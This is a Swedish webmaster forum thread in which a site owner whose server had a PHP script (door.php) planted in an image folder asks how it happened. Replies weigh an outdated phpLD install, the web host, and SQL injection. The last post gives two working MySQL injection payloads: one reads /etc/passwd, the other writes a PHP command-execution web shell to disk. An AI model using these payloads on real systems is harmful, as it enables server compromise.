[daniel_]

Jag skulle gissa på att det är phpLD som är problemet. Använder du gratisversionen (2.0?) så tycker jag du ska uppdatera.

[christi@n]

Citat:

Jag kan ju omöjligt veta vart jag använder samma lösenord som jag hade på Proinet, om jag ens har samma
någon annanstans. Vet inte...

va?

[jonny]

Om du hittar en door.php i imagemappen låter det som du kanske tillåter uppladdning av bilder och att det gick bra att ladda upp phpscript också; vilket inte är lysande direkt...

[clirre]

daniel: uppdatera till betalvarianten?

jonny: jag har inte aktiverat något sådant.

Vad är normala Permissions på mappar respektive filer?

[clirre]

Uppenbarligen så fungerade inte mitt förra ingrepp. Det var med sannolikhet alltså inte lösenord på vift.

Kan man ladda upp filer på en server med hjälp av SQL-injections?

[clirre]

Uppenbarligen så fungerade inte mitt förra ingrepp. Det var med sannolikhet alltså inte lösenord på vift.

Kan man ladda upp filer på en server med hjälp av SQL-injections alt. mha databasen ändra permissions på mappar så att man kan ladda upp scripts?

[clirre]

Hittade många bra trådar här om SQL-injections tex. http://www.webmasternetwork.se/index.php?a...=injection&s=wn

men jag som är ganska mkt nybörjare med php när det gäller avancerade funktioner undrar ändå. Logiskt sett så tycker jag att man inte borde kunna ändra skrivrättigheter och plantera skript via databasskrivningar. Eller?

Det står ganska klart att sql-injections är ett hål i säkerheten men vad borde jag leta efter mer? M.a.p. att skript har laddats upp och skrivrättigheterna ändrats två gånger där jag bytte alla lösenord emellan.

[tartareandesire]

SQL Injections kan endast påverka databasen (såvida man inte kommer åt annan information därigenom då).

Hade du bytt webbhotell? Säkerhetsbristen kan ligga där. Kontrollerat din egen dator?

[clirre]

Var rädd för att sql-injections inte var det enda problemet. Jag har phpLD installerat på samma server, vilket någon påpekade. Jag hittade en tråd där någon annan haft phpLD och fått samma problem. Det reddes dock aldrig ut om detta var anledningen.

Det skedde på Servage.com och de har jag haft ett tag, kanske ett år.

Har ett antivirusprogram som verkar väldigt mycket på hugget men kan inte svära på att jag inte har nåt skit på datorn.

[SimonP]

Citat:

Originally posted by tartareandesire@Feb 28 2008, 13:00
SQL Injections kan endast påverka databasen (såvida man inte kommer åt annan information därigenom då).

Ifall det finns tillräckliga rättigheter på databasen kan man både läsa och skapa filer med SQL injektioner.

T.ex för att läsa en fil:
SELECT LOAD_FILE('/etc/passwd');

Skapa:
SELECT '<?php system($_GET[\'cmd\']); ?>' INTO DUMPFILE '/tmp/shell.php';